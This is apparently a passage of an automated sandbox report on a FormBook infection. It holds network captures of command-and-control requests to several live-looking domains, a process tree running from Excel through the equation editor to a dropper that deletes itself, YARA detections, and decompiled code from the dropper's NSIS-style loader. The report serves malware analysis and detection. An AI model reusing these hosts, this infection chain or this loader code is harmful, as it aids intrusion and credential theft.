                                                                                                                                                                                                        Data Raw: 36 35 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e e8 8a 92 e6 9e 9c e8 a7 86 e9 a2 91 2f e5 a4 a9 e5 a4 a9 e7 9c 8b e7 89 87 e5 a4 a9 e5 a4 a9 e7 88 bd 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0d 0a 2a 7b 6d 61 72 67 69 6e 3a 30 70 78 20 61 75 74 6f 3b 7d 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 e5 ae 8b e4 bd 93 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 32 70 74 2f 31 35 70 74 20 e5 ae 8b e4 bd 93 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 e5 ae 8b e4 bd 93 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 3f 33 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c
                                                                                                                                                                                                        Data Ascii: 65c<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>/</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width,initial-scale=1.0,user-scalable=no"><STYLE type="text/css"> *{margin:0px auto;} BODY { font: 9pt/12pt } H1 { font: 12pt/15pt } H2 { font: 9pt/12pt } A:link { color: red } A:visited { color: maroon }</STYLE><script type="text/javascript" src="/tj.js?3"></script></HEAD><BODY><
                                                                                                                                                                                                        Feb 23, 2021 10:27:15.275492907 CET235INData Raw: 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e e6 82 a8 e6 9c aa e8 a2 ab e6 8e 88 e6 9d 83 e6 9f a5 e7 9c 8b e8 af a5 e9 a1
                                                                                                                                                                                                        Data Ascii: TABLE width=500 border=0 cellspacing=10><TR><TD><h1></h1><hr><p></p><ul><li>
                                                                                                                                                                                                        Feb 23, 2021 10:27:15.275523901 CET235INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                        3192.168.2.2249170103.251.44.21880C:\Windows\explorer.exe
                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                        Feb 23, 2021 10:27:20.771933079 CET236OUTGET /nsag/?SFN=1e70w6qoH0iHBmxDX27vpOpA5lfYuhHzBJ3+ZXyYbvrIHeDq+MUfY30bwUf90UJ6GkTmZw==&cBb=LtD0g HTTP/1.1
                                                                                                                                                                                                        Host: www.athara-kiano.com
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                        Feb 23, 2021 10:27:21.240080118 CET236INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                        X-Redirect-By: WordPress
                                                                                                                                                                                                        Location: https://www.athara-kiano.com/nsag/?SFN=1e70w6qoH0iHBmxDX27vpOpA5lfYuhHzBJ3+ZXyYbvrIHeDq+MUfY30bwUf90UJ6GkTmZw==&cBb=LtD0g
                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                        Date: Tue, 23 Feb 2021 09:27:21 GMT
                                                                                                                                                                                                        Server: LiteSpeed


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                        4192.168.2.2249171191.96.163.20280C:\Windows\explorer.exe
                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.555535078 CET237OUTGET /nsag/?SFN=toXeTgYrlJ3t8R2kv84tVNAusZG5KBfjoz4tCiNIzgm9lAElLlwfiIUD/nI/OmI1vpPL+Q==&cBb=LtD0g HTTP/1.1
                                                                                                                                                                                                        Host: www.overseaexpert.com
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.751426935 CET238INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Tue, 23 Feb 2021 09:27:26 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Content-Length: 203
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 73 61 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /nsag/ was not found on this server.</p></body></html>


                                                                                                                                                                                                        Code Manipulations

                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                        Analysis Process: EXCEL.EXE PID: 2312 Parent PID: 584

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:25:50
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                        Imagebase:0x13f880000
                                                                                                                                                                                                        File size:27641504 bytes
                                                                                                                                                                                                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                                        Analysis Process: EQNEDT32.EXE PID: 2296 Parent PID: 584

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:26:11
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:543304 bytes
                                                                                                                                                                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                                        Analysis Process: vbc.exe PID: 260 Parent PID: 2296

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:26:14
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:217624 bytes
                                                                                                                                                                                                        MD5 hash:2915C0AFB0B6B26A5A699965D2119F7A
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                        • Detection: 36%, ReversingLabs
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                                        Analysis Process: vbc.exe PID: 2876 Parent PID: 260

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:26:15
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:217624 bytes
                                                                                                                                                                                                        MD5 hash:2915C0AFB0B6B26A5A699965D2119F7A
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                                        Analysis Process: explorer.exe PID: 1388 Parent PID: 2876

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:26:18
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:
                                                                                                                                                                                                        Imagebase:0xffca0000
                                                                                                                                                                                                        File size:3229696 bytes
                                                                                                                                                                                                        MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                                        Analysis Process: ipconfig.exe PID: 3020 Parent PID: 1388

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:26:33
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                                                                        Imagebase:0x1a0000
                                                                                                                                                                                                        File size:27136 bytes
                                                                                                                                                                                                        MD5 hash:CABB20E171770FF64614A54C1F31C033
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                                        Analysis Process: cmd.exe PID: 2952 Parent PID: 3020

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:26:37
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                                                                        Imagebase:0x49d30000
                                                                                                                                                                                                        File size:302592 bytes
                                                                                                                                                                                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                        Code Analysis

                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                          Analysis Process: vbc.exe PID: 260 Parent PID: 2296 vbc.exeCOMMON

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          Function 00403486, Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 366stringcomfileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                          			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42f44c = _t42;
				if(_t42 != 6) {
					_t119 = E00406656(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E004065E8(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E00406656(0xb);
				 *0x42f444 = E00406656(9);
				_t47 = E00406656(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42f44f =  *0x42f44f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x42f518 = _t47;
				SHGetFileInfoA(0x429878, 0, _t164 + 0x38, 0x160, 0); // executed
				E0040624D("Setup Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\Public\\vbc.exe\" ";
				E0040624D(_t160, _t51);
				 *0x42f440 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Users\\Public\\vbc.exe\" " == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M00435001;
				}
				_t55 = CharNextA(E00405C10(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405C10(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E0040624D("C:\\Users\\Albus\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157);
										_t59 = E00403455(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EF1(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E0040396E();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x42f4f4;
													if( *0x42f4f4 == 0) {
														L67:
														_t63 =  *0x42f50c;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E00406656(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405969( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42f460 == 0) {
												L42:
												 *0x42f50c =  *0x42f50c | 0xffffffff;
												 *(_t164 + 0x18) = E00403A60( *0x42f50c);
												goto L43;
											}
											_t153 = E00405C10(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E004058D4(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\Public";
													if(lstrcmpiA(_t157, "C:\\Users\\Public") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E004058B7();
														} else {
															E0040583A();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\Albus\\AppData\\Local\\Temp"; // 0x43
														if(_t189 == 0) {
															E0040624D("C:\\Users\\Albus\\AppData\\Local\\Temp", _t162);
														}
														E0040624D(0x430000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x430400 = "A";
														do {
															E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x120)));
															DeleteFileA(0x429478);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\Public\\vbc.exe", 0x429478, 1) != 0) {
																E0040602C(_t137, 0x429478, 0);
																E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x124)));
																_t94 = E004058EC(0x429478);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x430400 =  *0x430400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E0040602C(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405CD3(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E0040624D("C:\\Users\\Albus\\AppData\\Local\\Temp", _t154);
												E0040624D("C:\\Users\\Albus\\AppData\\Local\\Temp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E00403455(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E00403455(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x42f500 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

































                                                                                                                                                                                                          0x00403496
                                                                                                                                                                                                          0x0040349a
                                                                                                                                                                                                          0x004034a2
                                                                                                                                                                                                          0x004034a6
                                                                                                                                                                                                          0x004034ab
                                                                                                                                                                                                          0x004034b7
                                                                                                                                                                                                          0x004034c0
                                                                                                                                                                                                          0x004034c5
                                                                                                                                                                                                          0x004034c8
                                                                                                                                                                                                          0x004034cf
                                                                                                                                                                                                          0x004034d6
                                                                                                                                                                                                          0x004034d6
                                                                                                                                                                                                          0x004034cf
